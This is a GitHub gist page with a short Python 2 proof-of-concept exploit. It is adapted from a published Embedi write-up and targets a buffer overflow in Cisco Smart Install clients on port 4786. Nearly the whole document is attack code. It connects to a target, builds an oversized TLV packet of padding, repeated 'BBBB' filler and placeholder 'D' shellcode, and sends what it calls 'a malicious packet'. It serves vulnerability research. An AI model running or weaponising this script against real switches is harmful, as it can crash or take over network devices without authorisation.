Created
April 9, 2018 14:24
-
-
Save smrx86/85529935c330df95d851ee279fb1d099 to your computer and use it in GitHub Desktop.
adaptation https://embedi.com/blog/cisco-smart-install-remote-code-execution/ from optparse module requirement to argparse.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # smi_ibc_init_discovery_BoF.py | |
| import socket | |
| import struct | |
| import argparse | |
| def parse_args(): | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument('-t','--target', help='Smart Install Client', action='store', required=True) | |
| parser.add_argument('-p','--port', type=int, help='Port of Client', default=4786 ) | |
| return parser.parse_args() | |
| def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'): | |
| return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v | |
| def send_packet(sock, packet): | |
| sock.send(packet) | |
| def receive(sock): | |
| return sock.recv() | |
| if __name__ == "__main__": | |
| args = parse_args() | |
| print "[*] Connecting to Smart Install Client ", args.target, "port", args.port | |
| con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| con.connect((args.target, args.port)) | |
| payload = 'BBBB' * 44 | |
| shellcode = 'D' * 2048 | |
| data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload | |
| tlv_1 = craft_tlv(0x00000001, data) | |
| tlv_2 = shellcode | |
| hdr = '\x00\x00\x00\x01' # msg_from | |
| hdr += '\x00\x00\x00\x01' # version | |
| hdr += '\x00\x00\x00\x07' # msg_hdr_type | |
| hdr += struct.pack('>I', len(data)) # data_length | |
| pkt = hdr + tlv_1 + tlv_2 | |
| print "[*] Send a malicious packet" | |
| send_packet(con, pkt) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment